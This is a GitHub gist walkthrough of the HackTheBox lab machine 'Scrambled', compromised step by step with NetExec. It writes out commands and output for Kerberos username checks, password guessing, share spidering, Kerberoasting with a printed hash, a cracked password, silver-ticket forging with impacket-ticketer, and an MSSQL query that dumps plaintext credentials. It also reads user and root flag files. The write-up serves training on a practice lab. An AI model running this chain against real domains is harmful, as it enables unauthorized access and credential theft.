Skip to content

Instantly share code, notes, and snippets.

@mpgn

mpgn/Scrambled vs NetExec .md

Last active April 23, 2024 03:03
Show Gist options
  • Star 7 You must be signed in to star a gist
  • Fork 3 You must be signed in to fork a gist
  • Save mpgn/9fc08b0f0fde55e8c322518bc1f9c317 to your computer and use it in GitHub Desktop.
Save mpgn/9fc08b0f0fde55e8c322518bc1f9c317 to your computer and use it in GitHub Desktop.
Download ZIP
Scrambled vs NetExec for fun and profit by @mpgn_x64
Raw
Scrambled vs NetExec .md

Scrambled vs NetExec

Let pwn the box Scrambled from HackTheBox using only NetExec ! For context, I was reading Scrambled writeup from 0xdf_ when I read this:

smbclient won’t work, and I wasn’t able to get crackmapexec to work either.

To be fair, at the time of his writeup it was true, but not anymore and it's pretty simple with NXC, 5 minutes and you get root :)

Note: I will pass the web part where we get one username : ksimpson

1. Getting domain info

netexec ldap 10.10.11.168
LDAP        10.10.11.168    389    DC1.scrm.local   [*]  x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
  • Target: DC1.scrm.local
  • Domain: scrm.local

We can update our /etc/hosts file

2. Check if user ksimpson exist

netexec ldap DC1.scrm.local -u ksimpson -p blabla     
LDAP        dc1.scrm.local  389    DC1.scrm.local   [*]  x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAP        dc1.scrm.local  389    DC1.scrm.local   [-] scrm.local\ksimpson:blabla STATUS_NOT_SUPPORTED

# with kerberos
netexec ldap DC1.scrm.local -u ksimpson -p blabla -k  
LDAP        DC1.scrm.local  389    DC1.scrm.local   [*]  x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAP        DC1.scrm.local  389    DC1.scrm.local   [-] scrm.local\ksimpson:blabla KDC_ERR_PREAUTH_FAILED

KDC_ERR_PREAUTH_FAILED => mean we have a valid username but bad password ! Let's try login = password ;) Also, you may have noticed the STATUS_NOT_SUPPORTED without kerberos option, it means NTLM is disabled on the domain, no big deal for NXC ;)

3. Checking ksimpson password

netexec ldap DC1.scrm.local -u ksimpson -p ksimpson -k
LDAP        DC1.scrm.local  389    DC1.scrm.local   [*]  x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAPS       DC1.scrm.local  636    DC1.scrm.local   [+] scrm.local\ksimpson

4. Enumerate shares

netexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k --shares
SMB         DC1.scrm.local  445    DC1.scrm.local   [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] scrm.local\ksimpson:ksimpson 
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] Enumerated shares
SMB         DC1.scrm.local  445    DC1.scrm.local   Share           Permissions     Remark
SMB         DC1.scrm.local  445    DC1.scrm.local   -----           -----------     ------
SMB         DC1.scrm.local  445    DC1.scrm.local   ADMIN$                          Remote Admin
SMB         DC1.scrm.local  445    DC1.scrm.local   C$                              Default share
SMB         DC1.scrm.local  445    DC1.scrm.local   HR                              
SMB         DC1.scrm.local  445    DC1.scrm.local   IPC$            READ            Remote IPC
SMB         DC1.scrm.local  445    DC1.scrm.local   IT                              
SMB         DC1.scrm.local  445    DC1.scrm.local   NETLOGON        READ            Logon server share 
SMB         DC1.scrm.local  445    DC1.scrm.local   Public          READ            
SMB         DC1.scrm.local  445    DC1.scrm.local   Sales                           
SMB         DC1.scrm.local  445    DC1.scrm.local   SYSVOL          READ            Logon server share

User can read "Public" share

5. Check files inside Public

netexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k -M spider_plus
SMB         DC1.scrm.local  445    DC1.scrm.local   [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] scrm.local\ksimpson:ksimpson 
SPIDER_P... DC1.scrm.local  445    DC1.scrm.local   [*] Started spidering plus with option:
SPIDER_P... DC1.scrm.local  445    DC1.scrm.local   [*]        DIR: ['print$']
SPIDER_P... DC1.scrm.local  445    DC1.scrm.local   [*]        EXT: ['ico', 'lnk']
SPIDER_P... DC1.scrm.local  445    DC1.scrm.local   [*]       SIZE: 51200
SPIDER_P... DC1.scrm.local  445    DC1.scrm.local   [*]     OUTPUT: /tmp/nxc_spider_plus

cat /tmp/nxc_spider_plus/DC1.scrm.local.json | grep 'Public' -A 6
    "Public": {
        "Network Security Changes.pdf": {
            "atime_epoch": "2021-11-04 18:23:11",
            "ctime_epoch": "2021-11-04 18:20:49",
            "mtime_epoch": "2021-11-05 13:45:07",
            "size": "615.34 KB"
        }

There is one file: "Network Security Changes.pdf", let's get the file :)

6. Getting file "Network Security Changes.pdf" on "Public" share:

netexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k --get-file 'Network Security Changes.pdf' /tmp/Network_Security_Changes.pdf --share "Public" 
SMB         DC1.scrm.local  445    DC1.scrm.local   [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] scrm.local\ksimpson:ksimpson 
SMB         DC1.scrm.local  445    DC1.scrm.local   [*] Copy Network Security Changes.pdf to /tmp/Network_Security_Changes.pdf
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] File Network Security Changes.pdf was transferred to /tmp/Network_Security_Changes.pdf

7. Get Kerberoastable users

netexec ldap DC1.scrm.local -u ksimpson -p ksimpson -k --kerberoasting /tmp/hash
LDAP        DC1.scrm.local  389    DC1.scrm.local   [*]  x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAPS       DC1.scrm.local  636    DC1.scrm.local   [+] scrm.local\ksimpson 
LDAPS       DC1.scrm.local  636    DC1.scrm.local   [*] Total of records returned 2
LDAPS       DC1.scrm.local  636    DC1.scrm.local   sAMAccountName: sqlsvc memberOf:  pwdLastSet: 2021-11-03 12:32:02.351452 lastLogon:2022-11-01 15:06:06.512547
LDAPS       DC1.scrm.local  636    DC1.scrm.local   $krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$3b7c5f0a4c366bceb1bb3f7747a898b8$d7519a37a494d59bb728c38677203f9a765440ccc6ab7105f5431c12dc17574fa164bbba88922216d9f2d2b717b7761b7ec449ddcf55b1578807e7d34b97fc1094b68db8ccd8356aa605d6d416cafa0fed51824009008034920a1251bd7f2e1405627f95ebffbbd7863cb7251f581bfdd7128854e6443e1d320af65d263cd6eec7d451b87e80ff611b07cc6fed0fc21b31c6f06a28ac78053c8ad023b4e45c01b8ba196eea2ae4d2e32a575cca0c0b2e25164f4e5b4457c4f630ef4c9d33d1b733dfe32e23548b14afe7748c96011eba7bf3a8bbaf2db500a1e8ffbd4927561969183b3b37ec99400c9e856852b6a62e3580b6129789c96ea8f5df0bb11fc10fd4de7ae0993ec17dd8c967b9cc130fe4aedb33df2a7b6e67816854bda58a3ea4e360ffd0499d54a984a6130dffea7241d8ced5e345ad0e8968b4ff1725825572c5a489ff77d912ed6a9f5dd4bff35e0299cb3b9ad665227d0f104de22bd395a2995c0692286d394e49e6eec1e4db89956c6049b60f697bdbab91eb1b232f047939744bd6b595d396d9a44af7b6dde719a0a1634463217e87137cb90b2cfd0b573406ea25b7c0bddc18a00981e0c84093f29da9f55573e480e7247de386c478345555911362c9de7a2460b0a593f178e125b3c50d376d3f6caadcf78a3493c100f007013923b8d6a13b04b5c44016c4ab36de56030a615d15d22c54b30f4952c5ddcf7b44b792033a3c1dfab7c1d2b5844af0f7e72449fc4cb1fe32a00fc61e77be03cd5dfbcb54e96d7f8cef7826a1ec1f533aef967796e57593cf762b819065b31a99c863f2c36076d62dc0eb6051261ecd5a940ab888ae8fc95dc09c4c3ca0173b414e338699749c7918a89928af702b9ed3a74721adb34c32a3f75a60660ddc0056734da74b824375f3c7cc743332f355955bee4f7dde448d2517ab68dcb8a4a34db2f802cfd98e3eee29bafc8937b99ee0da35c96be4ae77b03bc68b38b6f3b0f010dcaa8a9820ecdc9d86b2e7c111bcfbe9c9df93e0b21283d8b0630dee59dfbb9cfdbf464c18253081aa8832d79756d7bce6a7a0c597cba7b434a078edf70b8c6d774dc3a48761ecad0d391d787360ca33537b8ae3f4d763996f7edb7249d52ccd5fb9d465b7e088c1db7383ba963013c00bfa5c912b8a9d2b432613e68e7b331d1334494dfe57356203e1a3b7b1af1e84fcf56196e48dfd651ae6cb4932d4e057ad288dbf64cbf63490cad7cf427f3ba69066c1f9d597e61cbd9025833c91884a5d6b449ca54a9a75f43f0ebc1bcc0748c70d62e390083f022241cde53a3b056bfc78f245ef08674862d97ca2f7d9ca7b43f4554defceb80f1fe6dbd33ce27da7231ca8376bc5372f2a9e9be07001763850569a0aba4f82d663e1677ec20aec8bda13bda2b8994a7b24d369092e594fbfd23857f7405f08

# checking creds after cracking with Hashcat
netexec ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k                   
LDAP        DC1.scrm.local  389    DC1.scrm.local   [*]  x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAPS       DC1.scrm.local  636    DC1.scrm.local   [+] scrm.local\sqlsvc

8. Trying to connect to MSSQL

netexec mssql DC1.scrm.local -u sqlsvc -p Pegasus60 -d scrm.local -k
MSSQL       DC1.scrm.local  1433   None             [*] None (name:DC1.scrm.local) (domain:scrm.local)
MSSQL       DC1.scrm.local  1433   None             [-] ERROR(DC1): Line 1: Login failed for user 'SCRM\sqlsvc'

User cannot connect to the MSSQL (very strange but i guess it on purpose to exploit a Kerberos Silver Tickets which is very cool !

9. Getting the SID of the domain:

netexec ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k --get-sid
LDAP        DC1.scrm.local  389    DC1.scrm.local   [*]  x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAPS       DC1.scrm.local  636    DC1.scrm.local   [+] scrm.local\sqlsvc 
LDAPS       DC1.scrm.local  636    DC1.scrm.local   Domain SID S-1-5-21-2743207045-1827831105-2542523200

Notice the automatic switch between LDAP and LDAPS ! :D

10. We generate a ticket and use it with option --use-kcache

impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -dc-ip dc1.scrm.local -spn MSSQLSvc/dc1.scrm.local:1433 administrator 
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in administrator.ccache

export KRB5CCNAME=administrator.ccache
netexec mssql DC1.scrm.local --use-kcache  
MSSQL       dc1.scrm.local  1433   NONE             [*]  (name:) (domain:)
MSSQL       dc1.scrm.local  1433   NONE             [+] \ from ccache (Pwn3d!)

11. Execute MSSQL query

netexec mssql DC1.scrm.local --use-kcache --query "SELECT LdapUser,LdapPwd from ScrambleHR.dbo.UserImport;"
MSSQL       dc1.scrm.local  1433   NONE             [*]  (name:) (domain:)
MSSQL       dc1.scrm.local  1433   NONE             [+] \ from ccache (Pwn3d!)
MSSQL       dc1.scrm.local  1433   NONE             LdapUser
MSSQL       dc1.scrm.local  1433   NONE             LdapPwd
MSSQL       dc1.scrm.local  1433   NONE             --------------------------------------------------
MSSQL       dc1.scrm.local  1433   NONE             --------------------------------------------------
MSSQL       dc1.scrm.local  1433   NONE             MiscSvc
MSSQL       dc1.scrm.local  1433   NONE             ScrambledEggs9900

# checking new creds
netexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k                                                                                                            
SMB         DC1.scrm.local  445    DC1.scrm.local   [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] scrm.local\MiscSvc:ScrambledEggs9900

We got a new user:

  • User: MiscSvc
  • Password: ScrambledEggs9900

12. Getting user flag.txt

netexec mssql DC1.scrm.local --use-kcache --get-file 'c:\\users\\miscsvc\\desktop\\user.txt' /tmp/user.txt                                        
MSSQL       dc1.scrm.local  1433   NONE             [*]  (name:) (domain:)
MSSQL       dc1.scrm.local  1433   NONE             [+] \ from ccache (Pwn3d!)
MSSQL       dc1.scrm.local  1433   NONE             [*] Copy c:\\users\\miscsvc\\desktop\\user.txt to /tmp/user.txt
MSSQL       dc1.scrm.local  1433   NONE             [+] File c:\\users\\miscsvc\\desktop\\user.txt was transferred to /tmp/user.txt

12.bis Getting the root flag using (unatended solution ???)

netexec mssql DC1.scrm.local --use-kcache --get-file 'c:\\users\\administrator\\desktop\\root.txt' /tmp/root.txt
MSSQL       dc1.scrm.local  1433   NONE             [*]  (name:) (domain:)
MSSQL       dc1.scrm.local  1433   NONE             [+] \ from ccache (Pwn3d!)
MSSQL       dc1.scrm.local  1433   NONE             [*] Copy c:\\users\\administrator\\desktop\\root.txt to /tmp/root.txt
MSSQL       dc1.scrm.local  1433   NONE             [+] File c:\\users\\administrator\\desktop\\root.txt was transferred to /tmp/root.txt
                                                                                                                                                                                                                                                                       
cat /tmp/root.txt                                                                                                               
936c171e740f3009a405919f03a05644

We have the root flag but it seems it is not the end so let's go for the fun :)

13. Getting readable shares for user miscsvc

netexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k --shares                       
SMB         DC1.scrm.local  445    DC1.scrm.local   [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] scrm.local\MiscSvc:ScrambledEggs9900 
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] Enumerated shares
SMB         DC1.scrm.local  445    DC1.scrm.local   Share           Permissions     Remark
SMB         DC1.scrm.local  445    DC1.scrm.local   -----           -----------     ------
SMB         DC1.scrm.local  445    DC1.scrm.local   ADMIN$                          Remote Admin
SMB         DC1.scrm.local  445    DC1.scrm.local   C$                              Default share
SMB         DC1.scrm.local  445    DC1.scrm.local   HR                              
SMB         DC1.scrm.local  445    DC1.scrm.local   IPC$            READ            Remote IPC
SMB         DC1.scrm.local  445    DC1.scrm.local   IT              READ            
SMB         DC1.scrm.local  445    DC1.scrm.local   NETLOGON        READ            Logon server share 
SMB         DC1.scrm.local  445    DC1.scrm.local   Public          READ            
SMB         DC1.scrm.local  445    DC1.scrm.local   Sales                           
SMB         DC1.scrm.local  445    DC1.scrm.local   SYSVOL          READ            Logon server share

14. List file inside IT share

SMB         DC1.scrm.local  445    DC1.scrm.local   [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] scrm.local\MiscSvc:ScrambledEggs9900 
SPIDER_P... DC1.scrm.local  445    DC1.scrm.local   [*] Started spidering plus with option:
SPIDER_P... DC1.scrm.local  445    DC1.scrm.local   [*]        DIR: ['netlogon', 'public', 'sysvol', 'ipc$']
SPIDER_P... DC1.scrm.local  445    DC1.scrm.local   [*]        EXT: ['ico', 'lnk']
SPIDER_P... DC1.scrm.local  445    DC1.scrm.local   [*]       SIZE: 51200
SPIDER_P... DC1.scrm.local  445    DC1.scrm.local   [*]     OUTPUT: /tmp/nxc_spider_plus
                                                                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/netexec]
└─$ cat /tmp/nxc_spider_plus/DC1.scrm.local.json                                                                                                           
{
   "IT": {
       "Apps/Sales Order Client/ScrambleClient.exe": {
           "atime_epoch": "2021-11-05 16:57:06",
           "ctime_epoch": "2021-11-05 16:47:10",
           "mtime_epoch": "2021-11-05 16:57:08",
           "size": "84.5 KB"
       },
       "Apps/Sales Order Client/ScrambleLib.dll": {
           "atime_epoch": "2021-11-05 16:57:06",
           "ctime_epoch": "2021-11-05 16:47:10",
           "mtime_epoch": "2021-11-05 16:57:08",
           "size": "19 KB"
       }
   }
}

15. Getting the two files

crackmapexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900  -d scrm.local -k --get-file 'Apps/Sales Order Client/ScrambleClient.exe' /tmp/file.exe --share "IT"
SMB         DC1.scrm.local  445    DC1.scrm.local   [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] scrm.local\MiscSvc:ScrambledEggs9900 
SMB         DC1.scrm.local  445    DC1.scrm.local   [*] Copy Apps/Sales Order Client/ScrambleClient.exe to /tmp/file.exe
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] File Apps/Sales Order Client/ScrambleClient.exe was transferred to /tmp/file.exe

netexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900  -d scrm.local -k --get-file 'Apps/Sales Order Client/ScrambleLib.dll' /tmp/file.dll --share "IT"
SMB         DC1.scrm.local  445    DC1.scrm.local   [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] scrm.local\MiscSvc:ScrambledEggs9900 
SMB         DC1.scrm.local  445    DC1.scrm.local   [*] Copy Apps/Sales Order Client/ScrambleLib.dll to /tmp/file.dll
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] File Apps/Sales Order Client/ScrambleLib.dll was transferred to /tmp/file.dll

For the rest, follow https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html => part ScrambleClient Reverse !

That's all for me, I hope you learn a bit more about NetExec, for latest news follow me on twitter => @mpgn_x64 and follow @0xdf_ for the HTB writeup :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment